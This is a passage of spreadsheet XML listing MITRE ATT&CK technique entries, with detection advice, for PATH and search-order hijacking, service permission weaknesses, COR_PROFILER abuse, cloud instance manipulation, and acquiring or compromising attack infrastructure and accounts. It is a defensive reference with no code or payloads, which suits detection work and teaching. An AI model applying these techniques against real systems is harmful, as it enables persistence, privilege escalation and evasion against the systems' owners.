  <si>
    <t>T1574.007</t>
  </si>
  <si>
    <t>Path Interception by PATH Environment Variable</t>
  </si>
  <si>
    <t>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t>
  </si>
  <si>
    <t>Adversaries may execute their own malicious payloads by hijacking environment variables used to load libraries. Adversaries may place a program in an earlier entry in the list of directories stored in the PATH environment variable, which Windows will then execute when it searches sequentially through that PATH listing in search of the binary that was called from a script or the command line.
The PATH environment variable contains a list of directories. Certain methods of executing a program (namely using cmd.exe or the command-line) rely solely on the PATH environment variable to determine the locations that are searched for a program when the path for the program is not given. If any directories are listed in the PATH environment variable before the Windows directory, &lt;code&gt;%SystemRoot%\system32&lt;/code&gt; (e.g., &lt;code&gt;C:\Windows\system32&lt;/code&gt;), a program may be placed in the preceding directory that is named the same as a Windows program (such as cmd, PowerShell, or Python), which will be executed when that command is executed from a script or command-line.
For example, if &lt;code&gt;C:\example path&lt;/code&gt; precedes &lt;/code&gt;C:\Windows\system32&lt;/code&gt; is in the PATH environment variable, a program that is named net.exe and placed in &lt;code&gt;C:\example path&lt;/code&gt; will be called instead of the Windows system "net" when "net" is executed from the command-line.</t>
  </si>
  <si>
    <t>T1574.008</t>
  </si>
  <si>
    <t>Path Interception by Search Order Hijacking</t>
  </si>
  <si>
    <t xml:space="preserve">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
</t>
  </si>
  <si>
    <t>Adversaries may execute their own malicious payloads by hijacking the search order used to load other programs. Because some programs do not call other programs using the full path, adversaries may place their own file in the directory where the calling program is located, causing the operating system to launch their malicious software at the request of the calling program.
Search order hijacking occurs when an adversary abuses the order in which Windows searches for programs that are not given a path. Unlike [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001), the search order differs depending on the method that is used to execute the program. (Citation: Microsoft CreateProcess) (Citation: Windows NT Command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Microsoft Environment Property)
Search order hijacking is also a common practice for hijacking DLL loads and is covered in [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001).</t>
  </si>
  <si>
    <t>T1574.009</t>
  </si>
  <si>
    <t>Path Interception by Unquoted Path</t>
  </si>
  <si>
    <t>Adversaries may execute their own malicious payloads by hijacking vulnerable file path references. Adversaries can take advantage of paths that lack surrounding quotations by placing an executable in a higher level directory within the path, so that Windows will choose the adversary's executable to launch.
Service paths (Citation: Microsoft CurrentControlSet Services) and shortcut paths may also be vulnerable to path interception if the path has one or more spaces and is not surrounded by quotation marks (e.g., &lt;code&gt;C:\unsafe path with space\program.exe&lt;/code&gt; vs. &lt;code&gt;"C:\safe path with space\program.exe"&lt;/code&gt;). (Citation: Help eliminate unquoted path) (stored in Windows Registry keys)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Windows Unquoted Services) (Citation: Windows Privilege Escalation Guide)
This technique can be used for persistence if executables are called on a regular basis, as well as privilege escalation if intercepted executables are started by a higher privileged process.</t>
  </si>
  <si>
    <t>T1574.010</t>
  </si>
  <si>
    <t>Services File Permissions Weakness</t>
  </si>
  <si>
    <t>Process command-line parameters,Services,File monitoring</t>
  </si>
  <si>
    <t xml:space="preserve">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 </t>
  </si>
  <si>
    <t>Adversaries may execute their own malicious payloads by hijacking the binaries used by services. Adversaries may use flaws in the permissions of Windows services to replace the binary that is executed upon service start. These service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t>
  </si>
  <si>
    <t>T1574.011</t>
  </si>
  <si>
    <t>Services Registry Permissions Weakness</t>
  </si>
  <si>
    <t>Windows Registry,Services,Process command-line parameters</t>
  </si>
  <si>
    <t>Service changes are reflected in the Registry. Modification to existing services should not occur frequently. If a service binary path or failure parameters are changed to values that are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including listing current service information. (Citation: Autoruns for Windows)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be done to modify services. Remote access tools with built-in features may interact directly with the Windows API to perform these functions outside of typical system utilities. Services may also be changed through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001), so additional logging may need to be configured to gather the appropriate data.</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services. Adversaries may use flaws in the permissions for registry to redirect from the originally specified executable to one that they control, in order to launch their own code at Service start.  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[PowerShell](https://attack.mitre.org/techniques/T1059/001), or [Reg](https://attack.mitre.org/software/S0075). Access to Registry keys is controlled through Access Control Lists and permissions. (Citation: Registry Key Security)
If the permissions for users and groups are not properly set and allow access to the Registry keys for a service, then adversaries can change the service binPath/ImagePath to point to a different executable under their control. When the service starts or is restarted, then the adversary-controlled program will execute, allowing the adversary to gain persistence and/or privilege escalation to the account context the service is set to execute under (local/domain account, SYSTEM, LocalService, or NetworkService).
Adversaries may also alter Registry keys associated with service failure parameters (such as &lt;code&gt;FailureCommand&lt;/code&gt;) that may be executed in an elevated context anytime the service fails or is intentionally corrupted.(Citation: Kansa Service related collectors)(Citation: Tweet Registry Perms Weakness) </t>
  </si>
  <si>
    <t>T1574.012</t>
  </si>
  <si>
    <t>COR_PROFILER</t>
  </si>
  <si>
    <t>Windows Registry,File monitoring,Process monitoring,Process command-line parameters</t>
  </si>
  <si>
    <t>For detecting system and user scope abuse of the COR_PROFILER, monitor the Registry for changes to COR_ENABLE_PROFILING, COR_PROFILER, and COR_PROFILER_PATH that correspond to system and user environment variables that do not correlate to known developer tools. Extra scrutiny should be placed on suspicious modification of these Registry keys by command line tools like wmic.exe, setx.exe, and [Reg](https://attack.mitre.org/software/S0075), monitoring for command-line arguments indicating a change to COR_PROFILER variables may aid in detection. For system, user, and process scope abuse of the COR_PROFILER, monitor for new suspicious unmanaged profiling DLLs loading into .NET processes shortly after the CLR causing abnormal process behavior.(Citation: Red Canary COR_PROFILER May 2020) Consider monitoring for DLL files that are associated with COR_PROFILER environment variables.</t>
  </si>
  <si>
    <t>Adversaries may leverage the COR_PROFILER environment variable to hijack the execution flow of programs that load the .NET CLR. The COR_PROFILER is a .NET Framework feature which allows developers to specify an unmanaged (or external of .NET) profiling DLL to be loaded into each .NET process that loads the Common Language Runtime (CLR). These profiliers are designed to monitor, troubleshoot, and debug managed code executed by the .NET CLR.(Citation: Microsoft Profiling Mar 2017)(Citation: Microsoft COR_PROFILER Feb 2013)
The COR_PROFILER environment variable can be set at various scopes (system, user, or process) resulting in different levels of influence. System and user-wide environment variable scopes are specified in the Registry, where a [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM) object can be registered as a profiler DLL. A process scope COR_PROFILER can also be created in-memory without modifying the Registry. Starting with .NET Framework 4, the profiling DLL does not need to be registered as long as the location of the DLL is specified in the COR_PROFILER_PATH environment variable.(Citation: Microsoft COR_PROFILER Feb 2013)
Adversaries may abuse COR_PROFILER to establish persistence that executes a malicious DLL in the context of all .NET processes every time the CLR is invoked. The COR_PROFILER can also be used to elevate privileges (ex: [Bypass User Account Control](https://attack.mitre.org/techniques/T1548/002)) if the victim .NET process executes at a higher permission level, as well as to hook and [Impair Defenses](https://attack.mitre.org/techniques/T1562) provided by .NET processes.(Citation: RedCanary Mockingbird May 2020)(Citation: Red Canary COR_PROFILER May 2020)(Citation: Almond COR_PROFILER Apr 2019)(Citation: GitHub OmerYa Invisi-Shell)(Citation: subTee .NET Profilers May 2017)</t>
  </si>
  <si>
    <t>T1578</t>
  </si>
  <si>
    <t>Modify Cloud Compute Infrastructure</t>
  </si>
  <si>
    <t>Establish centralized logging for the activity of cloud compute infrastructure components. Monitor for suspicious sequences of events, such as the creation of multiple snapshots within a short period of time or the mount of a snapshot to a new instance by a new or unexpected user. To reduce false positives, valid change management procedures could introduce a known identifier that is logged with the change (e.g., tag or header) if supported by the cloud provider, to help distinguish valid, expected actions from malicious ones.</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</si>
  <si>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
Permissions gained from the modification of infrastructure components may bypass restrictions that prevent access to existing infrastructure. Modifying infrastructure components may also allow an adversary to evade detection and remove evidence of their presence.(Citation: Mandiant M-Trends 2020)</t>
  </si>
  <si>
    <t>T1578.001</t>
  </si>
  <si>
    <t>Create Snapshot</t>
  </si>
  <si>
    <t>GCP audit logs,Stackdriver logs,Azure activity logs,AWS CloudTrail logs</t>
  </si>
  <si>
    <t>The creation of a snapshot is a common part of operations within many cloud environments. Events should then not be viewed in isolation, but as part of a chain of behavior that could lead to other activities such as the creation of one or more snapshots and the restoration of these snapshots by a new user account.
In AWS, CloudTrail logs capture the creation of snapshots and all API calls for AWS Backup as events. Using the information collected by CloudTrail, you can determine the request that was made, the IP address from which the request was made, which user made the request, when it was made, and additional details.(Citation: AWS Cloud Trail Backup API).
In Azure, the creation of a snapshot may be captured in Azure activity logs. Backup restoration events can also be detected through Azure Monitor Log Data by creating a custom alert for completed restore jobs.(Citation: Azure - Monitor Logs)
Google's Admin Activity audit logs within their Cloud Audit logs can be used to detect the usage of the &lt;code&gt;gcloud compute instances create&lt;/code&gt; command to create a new VM disk from a snapshot.(Citation: Cloud Audit Logs) It is also possible to detect the usage of the GCP API with the &lt;code&gt;"sourceSnapshot":&lt;/code&gt; parameter pointed to &lt;code&gt;"global/snapshots/[BOOT_SNAPSHOT_NAME]&lt;/code&gt;.(Citation: GCP - Creating and Starting a VM)</t>
  </si>
  <si>
    <t>An adversary may create a snapshot or data backup within a cloud account to evade defenses. A snapshot is a point-in-time copy of an existing cloud compute component such as a virtual machine (VM), virtual hard drive, or volume. An adversary may leverage permissions to create a snapshot in order to bypass restrictions that prevent access to existing compute service infrastructure, unlike in [Revert Cloud Instance](https://attack.mitre.org/techniques/T1536) where an adversary may revert to a snapshot to evade detection and remove evidence of their presence.
An adversary may [Create Cloud Instance](https://attack.mitre.org/techniques/T1578/002), mount one or more created snapshots to that instance, and then apply a policy that allows the adversary access to the created instance, such as a firewall policy that allows them inbound and outbound SSH access.(Citation: Mandiant M-Trends 2020)</t>
  </si>
  <si>
    <t>T1578.002</t>
  </si>
  <si>
    <t>Create Cloud Instance</t>
  </si>
  <si>
    <t>The creation of a new instance or VM is a common part of operations within many cloud environments. Events should then not be viewed in isolation, but as part of a chain of behavior that could lead to other activities. For example, the creation of an instance by a new user account or the unexpected creation of one or more snapshots followed by the creation of an instance may indicate suspicious activity.
In AWS, CloudTrail logs capture the creation of an instance in the &lt;code&gt;RunInstances&lt;/code&gt; event, and in Azure the creation of a VM may be captured in Azure activity logs.(Citation: AWS CloudTrail Search)(Citation: Azure Activity Logs) Google's Admin Activity audit logs within their Cloud Audit logs can be used to detect the usage of &lt;code&gt;gcloud compute instances create&lt;/code&gt; to create a VM.(Citation: Cloud Audit Logs)</t>
  </si>
  <si>
    <t>An adversary may create a new instance or virtual machine (VM) within the compute service of a cloud account to evade defenses. Creating a new instance may allow an adversary to bypass firewall rules and permissions that exist on instances currently residing within an account. An adversary may [Create Snapshot](https://attack.mitre.org/techniques/T1578/001) of one or more volumes in an account, create a new instance, mount the snapshots, and then apply a less restrictive security policy to collect [Data from Local System](https://attack.mitre.org/techniques/T1005) or for [Remote Data Staging](https://attack.mitre.org/techniques/T1074/002).(Citation: Mandiant M-Trends 2020)
Creating a new instance may also allow an adversary to carry out malicious activity within an environment without affecting the execution of current running instances.</t>
  </si>
  <si>
    <t>T1578.003</t>
  </si>
  <si>
    <t>Delete Cloud Instance</t>
  </si>
  <si>
    <t>The deletion of a new instance or virtual machine is a common part of operations within many cloud environments. Events should then not be viewed in isolation, but as part of a chain of behavior that could lead to other activities. For example, detecting a sequence of events such as the creation of an instance, mounting of a snapshot to that instance, and deletion of that instance by a new user account may indicate suspicious activity.
In AWS, CloudTrail logs capture the deletion of an instance in the &lt;code&gt;TerminateInstances&lt;/code&gt; event, and in Azure the deletion of a VM may be captured in Azure activity logs.(Citation: AWS CloudTrail Search)(Citation: Azure Activity Logs) Google's Admin Activity audit logs within their Cloud Audit logs can be used to detect the usage of &lt;code&gt;gcloud compute instances delete&lt;/code&gt; to delete a VM.(Citation: Cloud Audit Logs)</t>
  </si>
  <si>
    <t>An adversary may delete a cloud instance after they have performed malicious activities in an attempt to evade detection and remove evidence of their presence.  Deleting an instance or virtual machine can remove valuable forensic artifacts and other evidence of suspicious behavior if the instance is not recoverable.
An adversary may also [Create Cloud Instance](https://attack.mitre.org/techniques/T1578/002) and later terminate the instance after achieving their objectives.(Citation: Mandiant M-Trends 2020)</t>
  </si>
  <si>
    <t>T1578.004</t>
  </si>
  <si>
    <t>Revert Cloud Instance</t>
  </si>
  <si>
    <t>Establish centralized logging of instance activity, which can be used to monitor and review system events even after reverting to a snapshot, rolling back changes, or changing persistence/type of storage. Monitor specifically for events related to snapshots and rollbacks and VM configuration changes, that are occurring outside of normal activity. To reduce false positives, valid change management procedures could introduce a known identifier that is logged with the change (e.g., tag or header) if supported by the cloud provider, to help distinguish valid, expected actions from malicious ones.</t>
  </si>
  <si>
    <t>An adversary may revert changes made to a cloud instance after they have performed malicious activities in attempt to evade detection and remove evidence of their presence. In highly virtualized environments, such as cloud-based infrastructure, this may be accomplished by restoring virtual machine (VM) or data storage snapshots through the cloud management dashboard or cloud APIs.
Another variation of this technique is to utilize temporary storage attached to the compute instance. Most cloud providers provide various types of storage including persistent, local, and/or ephemeral, with the ephemeral types often reset upon stop/restart of the VM.(Citation: Tech Republic - Restore AWS Snapshots)(Citation: Google - Restore Cloud Snapshot)</t>
  </si>
  <si>
    <t>T1580</t>
  </si>
  <si>
    <t>Cloud Infrastructure Discovery</t>
  </si>
  <si>
    <t>GCP audit logs,Stackdriver logs,AWS CloudTrail logs,Azure activity logs</t>
  </si>
  <si>
    <t>AWS,Azure,GCP</t>
  </si>
  <si>
    <t>Establish centralized logging for the activity of cloud infrastructure components. Monitor logs for actions that could be taken to gather information about cloud infrastructure, including the use of discovery API calls by new or unexpected users. To reduce false positives, valid change management procedures could introduce a known identifier that is logged with the change (e.g., tag or header) if supported by the cloud provider, to help distinguish valid, expected actions from malicious ones.</t>
  </si>
  <si>
    <t>An adversary may attempt to discover resources that are available within an infrastructure-as-a-service (IaaS) environment. This includes compute service resources such as instances, virtual machines, and snapshots as well as resources of other services including the storage and database services.
Cloud providers offer methods such as APIs and commands issued through CLIs to serve information about infrastructure. For example, AWS provides a &lt;code&gt;DescribeInstances&lt;/code&gt; API within the Amazon EC2 API that can return information about one or more instances within an account, as well as the &lt;code&gt;ListBuckets&lt;/code&gt; API that returns a list of all buckets owned by the authenticated sender of the request.(Citation: Amazon Describe Instance)(Citation: Amazon Describe Instances API) Similarly, GCP's Cloud SDK CLI provides the &lt;code&gt;gcloud compute instances list&lt;/code&gt; command to list all Google Compute Engine instances in a project(Citation: Google Compute Instances), and Azure's CLI command &lt;code&gt;az vm list&lt;/code&gt; lists details of virtual machines.(Citation: Microsoft AZ CLI)
An adversary may enumerate resources using a compromised user's access keys to determine which are available to that user.(Citation: Expel IO Evil in AWS) The discovery of these available resources may help adversaries determine their next steps in the Cloud environment, such as establishing Persistence.(Citation: Mandiant M-Trends 2020) Unlike in [Cloud Service Discovery](https://attack.mitre.org/techniques/T1526), this technique focuses on the discovery of components of the provided services rather than the services themselves.</t>
  </si>
  <si>
    <t>T1583</t>
  </si>
  <si>
    <t>Acquire Infrastructure</t>
  </si>
  <si>
    <t>PRE</t>
  </si>
  <si>
    <t>Consider use of services that may aid in tracking of newly acquired infrastructure, such as WHOIS databases for domain registration information. Much of this activity may take place outside the visibility of the target organization, making detection of this behavior difficult.
Detection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control.</t>
  </si>
  <si>
    <t>Before compromising a victim, adversaries may buy, lease, or rent infrastructure that can be used during targeting. A wide variety of infrastructure exists for hosting and orchestrating adversary operations. Infrastructure solutions include physical or cloud servers, domains, and third-party web services.(Citation: TrendmicroHideoutsLease) Additionally, botnets are available for rent or purchase.
Use of these infrastructure solutions allows an adversary to stage, launch, and execute an operation. Solutions may help adversary operations blend in with traffic that is seen as normal, such as contact to third-party web services. Depending on the implementation, adversaries may use infrastructure that makes it difficult to physically tie back to them as well as utilize infrastructure that can be rapidly provisioned, modified, and shut down.</t>
  </si>
  <si>
    <t>resource-development</t>
  </si>
  <si>
    <t>T1583.001</t>
  </si>
  <si>
    <t>Domains</t>
  </si>
  <si>
    <t>Domain registration</t>
  </si>
  <si>
    <t>Domain registration information is, by design, captured in public registration logs. Consider use of services that may aid in tracking of newly acquired domains, such as WHOIS databases and/or passive DNS. In some cases it may be possible to pivot on known pieces of domain registration information to uncover other infrastructure purchased by the adversary. Consider monitoring for domains created with a similar structure to your own, including under a different TLD. Though various tools and services exist to track, query, and monitor domain name registration information, tracking across multiple DNS infrastructures can require multiple tools/services or more advanced analytics.
Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access and Command and Control.</t>
  </si>
  <si>
    <t>Before compromising a victim, adversaries may purchase domains that can be used during targeting. Domain names are the human readable names used to represent one or more IP addresses. They can be purchased or, in some cases, acquired for free.
Adversaries can use purchased domains for a variety of purposes, including for [Phishing](https://attack.mitre.org/techniques/T1566), [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), and Command and Control.(Citation: CISA MSS Sep 2020) Adversaries may choose domains that are similar to legitimate domains, including through use of homoglyphs or use of a different top-level domain (TLD).(Citation: FireEye APT28)(Citation: PaypalScam) Typosquatting may be used to aid in delivery of payloads via [Drive-by Compromise](https://attack.mitre.org/techniques/T1189). Adversaries can also use internationalized domain names (IDNs) to create visually similar lookalike domains for use in operations.(Citation: CISA IDN ST05-016)
Domain registrars each maintain a publicly viewable database that displays contact information for every registered domain. Private WHOIS services display alternative information, such as their own company data, rather than the owner of the domain. Adversaries may use such private WHOIS services to obscure information about who owns a purchased domain. Adversaries may further interrupt efforts to track their infrastructure by using varied registration information and purchasing domains with different domain registrars.(Citation: Mandiant APT1)</t>
  </si>
  <si>
    <t>T1583.002</t>
  </si>
  <si>
    <t>DNS Server</t>
  </si>
  <si>
    <t>Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control.</t>
  </si>
  <si>
    <t>Before compromising a victim, adversaries may set up their own Domain Name System (DNS) servers that can be used during targeting. During post-compromise activity, adversaries may utilize DNS traffic for various tasks, including for Command and Control (ex: [Application Layer Protocol](https://attack.mitre.org/techniques/T1071)). Instead of hijacking existing DNS servers, adversaries may opt to configure and run their own DNS servers in support of operations.
By running their own DNS servers, adversaries can have more control over how they administer server-side DNS C2 traffic ([DNS](https://attack.mitre.org/techniques/T1071/004)). With control over a DNS server, adversaries can configure DNS applications to provide conditional responses to malware and, generally, have more flexibility in the structure of the DNS-based C2 channel.(Citation: Unit42 DNS Mar 2019)</t>
  </si>
  <si>
    <t>T1583.003</t>
  </si>
  <si>
    <t>Virtual Private Server</t>
  </si>
  <si>
    <t>Before compromising a victim, adversaries may rent Virtual Private Servers (VPSs) that can be used during targeting. There exist a variety of cloud service providers that will sell virtual machines/containers as a service. By utilizing a VPS, adversaries can make it difficult to physically tie back operations to them. The use of cloud infrastructure can also make it easier for adversaries to rapidly provision, modify, and shut down their infrastructure.
Acquiring a VPS for use in later stages of the adversary lifecycle, such as Command and Control, can allow adversaries to benefit from the ubiquity and trust associated with higher reputation cloud service providers. Adversaries may also acquire infrastructure from VPS service providers that are known for renting VPSs with minimal registration information, allowing for more anonymous acquisitions of infrastructure.(Citation: TrendmicroHideoutsLease)</t>
  </si>
  <si>
    <t>T1583.004</t>
  </si>
  <si>
    <t>Server</t>
  </si>
  <si>
    <t>Before compromising a victim, adversaries may buy, lease, or rent physical servers that can be used during targeting. Use of servers allows an adversary to stage, launch, and execute an operation. During post-compromise activity, adversaries may utilize servers for various tasks, including for Command and Control. Instead of compromising a third-party [Server](https://attack.mitre.org/techniques/T1584/004) or renting a [Virtual Private Server](https://attack.mitre.org/techniques/T1583/003), adversaries may opt to configure and run their own servers in support of operations.
Adversaries may only need a lightweight setup if most of their activities will take place using online infrastructure. Or, they may need to build extensive infrastructure if they want to test, communicate, and control other aspects of their activities on their own systems.(Citation: NYTStuxnet)</t>
  </si>
  <si>
    <t>T1583.005</t>
  </si>
  <si>
    <t>Botnet</t>
  </si>
  <si>
    <t>Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during [Phishing](https://attack.mitre.org/techniques/T1566), [Endpoint Denial of Service](https://attack.mitre.org/techniques/T1499), or [Network Denial of Service](https://attack.mitre.org/techniques/T1498).</t>
  </si>
  <si>
    <t>Before compromising a victim, adversaries may buy, lease, or rent a network of compromised systems that can be used during targeting. A botnet is a network of compromised systems that can be instructed to perform coordinated tasks.(Citation: Norton Botnet) Adversaries may purchase a subscription to use an existing botnet from a booter/stressor service. With a botnet at their disposal, adversaries may perform follow-on activity such as large-scale [Phishing](https://attack.mitre.org/techniques/T1566) or Distributed Denial of Service (DDoS).(Citation: Imperva DDoS for Hire)(Citation: Krebs-Anna)(Citation: Krebs-Bazaar)(Citation: Krebs-Booter)</t>
  </si>
  <si>
    <t>T1583.006</t>
  </si>
  <si>
    <t>Web Services</t>
  </si>
  <si>
    <t>Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control ([Web Service](https://attack.mitre.org/techniques/T1102)) or [Exfiltration Over Web Service](https://attack.mitre.org/techniques/T1567).</t>
  </si>
  <si>
    <t>Before compromising a victim, adversaries may register for web services that can be used during targeting. A variety of popular websites exist for adversaries to register for a web-based service that can be abused during later stages of the adversary lifecycle, such as during Command and Control ([Web Service](https://attack.mitre.org/techniques/T1102)) or [Exfiltration Over Web Service](https://attack.mitre.org/techniques/T1567). Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. By utilizing a web service, adversaries can make it difficult to physically tie back operations to them.</t>
  </si>
  <si>
    <t>T1584</t>
  </si>
  <si>
    <t>Compromise Infrastructure</t>
  </si>
  <si>
    <t>Much of this activity will take place outside the visibility of the target organization, making detection difficult for defenders. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control.</t>
  </si>
  <si>
    <t>Before compromising a victim, adversaries may compromise third-party infrastructure that can be used during targeting. Infrastructure solutions include physical or cloud servers, domains, and third-party web services. Instead of buying, leasing, or renting infrastructure an adversary may compromise infrastructure and use it during other phases of the adversary lifecycle.(Citation: Mandiant APT1)(Citation: ICANNDomainNameHijacking)(Citation: Talos DNSpionage Nov 2018)(Citation: FireEye EPS Awakens Part 2) Additionally, adversaries may compromise numerous machines to form a botnet they can leverage.
Use of compromised infrastructure allows an adversary to stage, launch, and execute an operation. Compromised infrastructure can help adversary operations blend in with traffic that is seen as normal, such as contact with high reputation or trusted sites. By using compromised infrastructure, adversaries may make it difficult to tie their actions back to them. Prior to targeting, adversaries may compromise the infrastructure of other adversaries.(Citation: NSA NCSC Turla OilRig)</t>
  </si>
  <si>
    <t>T1584.001</t>
  </si>
  <si>
    <t>Before compromising a victim, adversaries may hijack domains and/or subdomains that can be used during targeting. Domain registration hijacking is the act of changing the registration of a domain name without the permission of the original registrant.(Citation: ICANNDomainNameHijacking) An adversary may gain access to an email account for the person listed as the owner of the domain. The adversary can then claim that they forgot their password in order to make changes to the domain registration. Other possibilities include social engineering a domain registration help desk to gain access to an account or taking advantage of renewal process gaps.
Subdomain hijacking can occur when organizations have DNS entries that point to non-existent or deprovisioned resources. In such cases, an adversary may take control of a subdomain to conduct operations with the benefit of the trust associated with that domain.(Citation: Microsoft Sub Takeover 2020)</t>
  </si>
  <si>
    <t>T1584.002</t>
  </si>
  <si>
    <t>Before compromising a victim, adversaries may compromise third-party DNS servers that can be used during targeting. During post-compromise activity, adversaries may utilize DNS traffic for various tasks, including for Command and Control (ex: [Application Layer Protocol](https://attack.mitre.org/techniques/T1071)). Instead of setting up their own DNS servers, adversaries may compromise third-party DNS servers in support of operations.
By compromising DNS servers, adversaries can alter DNS records. Such control can allow for redirection of an organization's traffic, facilitating Collection and Credential Access efforts for the adversary.(Citation: Talos DNSpionage Nov 2018)(Citation: FireEye DNS Hijack 2019) Adversaries may also be able to silently create subdomains pointed at malicious servers without tipping off the actual owner of the DNS server.(Citation: CiscoAngler)(Citation: Proofpoint Domain Shadowing)</t>
  </si>
  <si>
    <t>T1584.003</t>
  </si>
  <si>
    <t>Before compromising a victim, adversaries may compromise third-party Virtual Private Servers (VPSs) that can be used during targeting. There exist a variety of cloud service providers that will sell virtual machines/containers as a service. Adversaries may compromise VPSs purchased by third-party entities. By compromising a VPS to use as infrastructure, adversaries can make it difficult to physically tie back operations to themselves.(Citation: NSA NCSC Turla OilRig)
Compromising a VPS for use in later stages of the adversary lifecycle, such as Command and Control, can allow adversaries to benefit from the ubiquity and trust associated with higher reputation cloud service providers as well as that added by the compromised third-party.</t>
  </si>
  <si>
    <t>T1584.004</t>
  </si>
  <si>
    <t>Before compromising a victim, adversaries may compromise third-party servers that can be used during targeting. Use of servers allows an adversary to stage, launch, and execute an operation. During post-compromise activity, adversaries may utilize servers for various tasks, including for Command and Control. Instead of purchasing a [Server](https://attack.mitre.org/techniques/T1583/004) or [Virtual Private Server](https://attack.mitre.org/techniques/T1583/003), adversaries may compromise third-party servers in support of operations.
Adversaries may also compromise web servers to support watering hole operations, as in [Drive-by Compromise](https://attack.mitre.org/techniques/T1189).</t>
  </si>
  <si>
    <t>T1584.005</t>
  </si>
  <si>
    <t>Before compromising a victim, adversaries may compromise numerous third-party systems to form a botnet that can be used during targeting. A botnet is a network of compromised systems that can be instructed to perform coordinated tasks.(Citation: Norton Botnet) Instead of purchasing/renting a botnet from a booter/stressor service(Citation: Imperva DDoS for Hire), adversaries may build their own botnet by compromising numerous third-party systems. Adversaries may also conduct a takeover of an existing botnet, such as redirecting bots to adversary-controlled C2 servers.(Citation: Dell Dridex Oct 2015) With a botnet at their disposal, adversaries may perform follow-on activity such as large-scale [Phishing](https://attack.mitre.org/techniques/T1566) or Distributed Denial of Service (DDoS).</t>
  </si>
  <si>
    <t>T1584.006</t>
  </si>
  <si>
    <t>Before compromising a victim, adversaries may compromise access to third-party web services that can be used during targeting. A variety of popular websites exist for legitimate users to register for web-based services, such as GitHub, Twitter, Dropbox, Google, etc. Adversaries may try to take ownership of a legitimate user's access to a web service and use that web service as infrastructure in support of cyber operations. Such web services can be abused during later stages of the adversary lifecycle, such as during Command and Control ([Web Service](https://attack.mitre.org/techniques/T1102)) or [Exfiltration Over Web Service](https://attack.mitre.org/techniques/T1567).(Citation: Recorded Future Turla Infra 2020) Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. By utilizing a web service, particularly when access is stolen from legitimate users, adversaries can make it difficult to physically tie back operations to them.</t>
  </si>
  <si>
    <t>T1585</t>
  </si>
  <si>
    <t>Establish Accounts</t>
  </si>
  <si>
    <t>Social media monitoring</t>
  </si>
  <si>
    <t>Consider monitoring social media activity related to your organization. Suspicious activity may include personas claiming to work for your organization or recently created/modified accounts making numerous connection requests to accounts affiliated with your organization.
Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access (ex: [Phishing](https://attack.mitre.org/techniques/T1566)).</t>
  </si>
  <si>
    <t>Before compromising a victim, adversaries may create and cultivate accounts with services that can be used during targeting. Adversaries can create accounts that can be used to build a persona to further operations. Persona development consists of the development of public information, presence, history and appropriate affiliations. This development could be applied to social media, website, or other publicly available information that could be referenced and scrutinized for legitimacy over the course of an operation using that persona or identity.(Citation: NEWSCASTER2014)(Citation: BlackHatRobinSage)
For operations incorporating social engineering, the utilization of an online persona may be important. These personas may be fictitious or impersonate real people. The persona may exist on a single site or across multiple sites (ex: Facebook, LinkedIn, Twitter, Google, etc.). Establishing a persona may require development of additional documentation to make them seem real. This could include filling out profile information, developing social networks, or incorporating photos.(Citation: NEWSCASTER2014)(Citation: BlackHatRobinSage)
Establishing accounts can also include the creation of accounts with email providers, which may be directly leveraged for [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Phishing](https://attack.mitre.org/techniques/T1566).(Citation: Mandiant APT1)</t>
  </si>
  <si>
    <t>T1585.001</t>
  </si>
  <si>
    <t>Social Media Accounts</t>
  </si>
  <si>
    <t>Consider monitoring social media activity related to your organization. Suspicious activity may include personas claiming to work for your organization or recently created/modified accounts making numerous connection requests to accounts affiliated with your organization.
Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access (ex: [Spearphishing via Service](https://attack.mitre.org/techniques/T1566/003)).</t>
  </si>
  <si>
    <t>Before compromising a victim, adversaries may create and cultivate social media accounts that can be used during targeting. Adversaries can create social media accounts that can be used to build a persona to further operations. Persona development consists of the development of public information, presence, history and appropriate affiliations.(Citation: NEWSCASTER2014)(Citation: BlackHatRobinSage)
For operations incorporating social engineering, the utilization of a persona on social media may be important. These personas may be fictitious or impersonate real people. The persona may exist on a single social media site or across multiple sites (ex: Facebook, LinkedIn, Twitter, etc.). Establishing a persona  on social media may require development of additional documentation to make them seem real. This could include filling out profile information, developing social networks, or incorporating photos. 
Once a persona has been developed an adversary can use it to create connections to targets of interest. These connections may be direct or may include trying to connect through others.(Citation: NEWSCASTER2014)(Citation: BlackHatRobinSage) These accounts may be leveraged during other phases of the adversary lifecycle, such as during Initial Access (ex: [Spearphishing via Service](https://attack.mitre.org/techniques/T1566/003)).</t>
  </si>
  <si>
    <t>T1585.002</t>
  </si>
  <si>
    <t>Email Accounts</t>
  </si>
  <si>
    <t>Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access (ex: [Phishing](https://attack.mitre.org/techniques/T1566)).</t>
  </si>
  <si>
